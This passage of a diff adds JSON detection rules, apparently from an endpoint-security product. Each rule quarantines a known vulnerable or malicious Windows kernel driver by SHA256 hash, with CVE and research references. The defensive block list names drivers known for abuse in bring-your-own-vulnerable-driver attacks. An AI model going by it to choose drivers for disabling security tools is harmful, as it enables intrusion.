+ "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475647Z", + "creation_date": "2026-03-23T11:45:30.475650Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475658Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + 
"value": "d84e3e250a86227c64a96f6d5ac2b447674ba93d399160850acb2339da43eae5", + "comment": "Vulnerable Kernel Driver (aka directio64.sys) [https://www.loldrivers.io/drivers/a254e684-f6eb-40c4-a50a-7b76feb6cc02/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "418f210f-f7f4-504f-a49a-ad39f94b86cc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835573Z", + "creation_date": "2026-03-23T11:45:30.835575Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835581Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "af69ca9a69ca3f344d67646851347288fd12e7cdda2752c73d30330474eb9eca", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "419a3541-0988-5d4f-9f97-5b3eff5934a6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817480Z", + "creation_date": "2026-03-23T11:45:31.817482Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817487Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4bd9897e9015714c68648a43917b55d785ed9cbb56f6f8dab29bedb683a9c8b4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "419c1f2f-8fc1-5f34-970a-1b8bed129bbd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816358Z", + "creation_date": "2026-03-23T11:45:30.816361Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816366Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "733789d0a253e8d80cc3240e365b8d4274e510e36007f6e4b5fd13b07b084c3e", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) 
[https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "419e290d-a64e-511b-991f-207c02fd7463", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617954Z", + "creation_date": "2026-03-23T11:45:29.617956Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617961Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "15c53eb3a0ea44bbd2901a45a6ebeae29bb123f9c1115c38dfb2cdbec0642229", + "comment": "Vulnerable Kernel Driver (aka nt6.sys) [https://www.loldrivers.io/drivers/e71f0866-e317-44d4-a456-d6f0c555aa73/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "41a13983-1ca5-52fe-a8b7-205ea2607ffb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816377Z", + "creation_date": "2026-03-23T11:45:30.816380Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816386Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a01529ce82033d94802a3e0cc6a361d51200588068f5bd4f0a08ea05e061240f", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "41a95312-c9dd-5551-b80f-18a1b32ccbaf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609667Z", + "creation_date": "2026-03-23T11:45:29.609669Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609674Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "28999af32b55ddb7dcfc26376a244aa2fe297233ce7abe4919a1aef2f7e2cee7", + "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "41aa1e0e-a7f7-54ba-b3e1-f48ccbfa4e72", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614127Z", + "creation_date": "2026-03-23T11:45:29.614129Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614135Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89", + "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "41aad461-f9a2-5115-a520-dd3e5d7fdc5d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833147Z", + "creation_date": "2026-03-23T11:45:30.833150Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833158Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "99fc46919b6105ecf2d4dae5aca785ac652828e42faede1468be593e52c3acaf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "41b7d4bc-0327-5f72-83d5-2493afdb32f7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811240Z", + "creation_date": "2026-03-23T11:45:31.811242Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811247Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7d74454fbc48c1a5a7dc35f53d58200e49291c34f26ed274bc454abc1ba26002", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "41e36f27-0ab3-56cf-b159-d90b80516f1a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620313Z", + "creation_date": "2026-03-23T11:45:29.620315Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620321Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6f55c148bb27c14408cf0f16f344abcd63539174ac855e510a42d78cfaec451c", + "comment": "Vulnerable Kernel Driver (aka amsdk.sys) [https://www.loldrivers.io/drivers/a285591e-ad3c-46a3-a648-c58589ff5efc/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "41e43ac2-3a79-5a07-9afd-24c517047628", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828347Z", + "creation_date": "2026-03-23T11:45:30.828349Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828354Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "965e2a08a3ad054cd8356ccdd7513613902ce3be7bcc262ca156e9db2cf0f4db", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) 
AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "41e8b632-5520-5884-9050-4cdc14e50047", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.147040Z", + "creation_date": "2026-03-23T11:45:32.147042Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.147048Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "51ad864af75441b537ab0a37cf045f19117eab5e10fc179ef1e8164d9ef5d2e0", + "comment": "Vulnerable Kernel Driver (aka ThrottleBlood.sys) [https://securelist.com/av-killer-exploiting-throttlestop-sys/117026/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "41f8d812-ab1a-5ebd-b072-d7c30d506666", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154747Z", + "creation_date": 
"2026-03-23T11:45:31.154751Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154759Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e852b54ff7357691235f9a359f8ec625fafc784f991acde0b3973621a06fbb6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "41fa1afb-8212-5384-bd77-241a7e9f6634", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817841Z", + "creation_date": "2026-03-23T11:45:30.817844Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817851Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee067313bd75acae24e1661cb6807ed6148f9af34542ed77578144b21f5c8da1", + "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"41fd5ea9-cab5-5332-8ab8-cd194e0a08d1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826443Z", + "creation_date": "2026-03-23T11:45:30.826445Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826451Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5db520afe0278928b9b70b22e991b331d381ab959e4bb1472266dc57c9bd8e40", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "42004600-13ad-59bb-a2e0-9fa0a639aba7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610475Z", + "creation_date": "2026-03-23T11:45:29.610477Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.610482Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "600a2119657973112025db3c0eeab2e69d528bccfeed75f40c6ef50b059ec8a0", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "420221e4-9d20-55a2-a482-f1a335387419", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479666Z", + "creation_date": "2026-03-23T11:45:31.479670Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479680Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1970441341b44c20f80b2517a42db7623dc62d57458e74894593eadca0acc9e9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4208851a-654a-5120-873e-44354ba7f6cc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498308Z", + "creation_date": "2026-03-23T11:45:31.498311Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498319Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5b6d6ed719ae1555fc75a05425ebc9ce79b7f47b36baffa1014e1e3d413a2f07", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "4209a3e6-61c9-586c-9006-c316df385742", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829412Z", + "creation_date": "2026-03-23T11:45:30.829414Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829419Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash",
+ "value": "e247b7a0e986e0d9660d85b90a2f1c4d8dc3e515c339fa1e936898f86e096336",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "420ff32a-3448-5184-b3b9-6e95c9821753",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983158Z",
+ "creation_date": "2026-03-23T11:45:29.983160Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983165Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a000d211840cb8fbcbf95c334b1d04eadb45ba03b0413c96472e47e9e22413ff",
+ "comment": "Malicious Kernel Driver (aka daxin_blank.sys) [https://www.loldrivers.io/drivers/7e80423f-8b30-4ee2-b904-9f5421826a8c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "421114ff-0593-5dc3-bdbf-f4925659789f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468078Z",
+ "creation_date": "2026-03-23T11:45:30.468082Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468091Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6789e1a2e0d23528a91e49851bd95bceb6ffe9927f34b52a78ecc2b1d4bc13b8",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4215f19c-f133-58ac-8a9f-29c91f4935e0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807520Z",
+ "creation_date": "2026-03-23T11:45:31.807523Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807528Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7d7e34a5c9298104911195dd590f209e47b62d81792aac6a1acc2e9c9cb4a86",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42279296-c72e-5724-8287-cc4786a28e59",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832077Z",
+ "creation_date": "2026-03-23T11:45:30.832079Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832085Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "87fbc22a0d7a65cf3078f1ff46f7b82922a3d8a5cf9b7e5d4c5bb885d1fc7009",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "42318282-1774-5511-a02a-11bc363b97f6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
